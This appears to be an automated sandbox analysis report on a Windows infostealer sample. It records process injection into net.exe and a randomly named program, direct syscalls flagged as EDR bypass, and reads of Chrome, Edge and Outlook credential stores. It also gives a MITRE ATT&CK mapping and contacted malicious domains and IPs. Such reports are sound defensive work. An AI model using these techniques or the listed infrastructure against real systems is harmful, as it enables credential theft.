Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Memory written: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: read write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Thread register set: target process: 5552
Source: C:\Windows\SysWOW64\net.exe | Thread APC queued: target process: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: TjdgrMPwNLGImh.exe, 0000000A.00000002.4653190817.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000000.2563900952.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714345069.0000000000E81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a number in front of a technique is the count of matched signatures for that technique, techniques without a number were not observed):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 14 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (graph image not available; the node and edge data recovered from it follow)

Behavior Graph ID: 1608114
Sample: Gd3lOevK672JYIK.zip.exe
Startdate: 06/02/2025
Architecture: WINDOWS
Score: 100

Start node:
  DNS/IP: www.superhoroz.xyz; www.physicsbrain.xyz; 14 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
  Signature on www.physicsbrain.xyz: Performs DNS queries to domains with low reputation
  Process started: Gd3lOevK672JYIK.zip.exe

Gd3lOevK672JYIK.zip.exe (process 10):
  Dropped file: C:\Users\user\...\Gd3lOevK672JYIK.zip.exe.log, ASCII
  Signature: Injects a PE file into a foreign processes
  Processes started: Gd3lOevK672JYIK.zip.exe (process 14); Gd3lOevK672JYIK.zip.exe (process 17)

Gd3lOevK672JYIK.zip.exe (process 14):
  Signature: Maps a DLL or memory area into another process
  Injected into: TjdgrMPwNLGImh.exe (process 19)

TjdgrMPwNLGImh.exe (process 19):
  Signature: Found direct / indirect Syscall (likely to bypass EDR)
  Process started: net.exe (process 22)

net.exe (process 22):
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected into: TjdgrMPwNLGImh.exe (process 25)
  Process started: firefox.exe (process 29)

TjdgrMPwNLGImh.exe (process 25):
  DNS/IP: www.adjokctp.icu 172.67.179.147, ports 57312, 57313, 57314, CLOUDFLARENETUS, United States
  DNS/IP: www.physicsbrain.xyz 13.248.169.48, ports 57302, 57303, 57305, AMAZON-02US, United States
  DNS/IP: 7 other IPs or domains
  Signature: Found direct / indirect Syscall (likely to bypass EDR)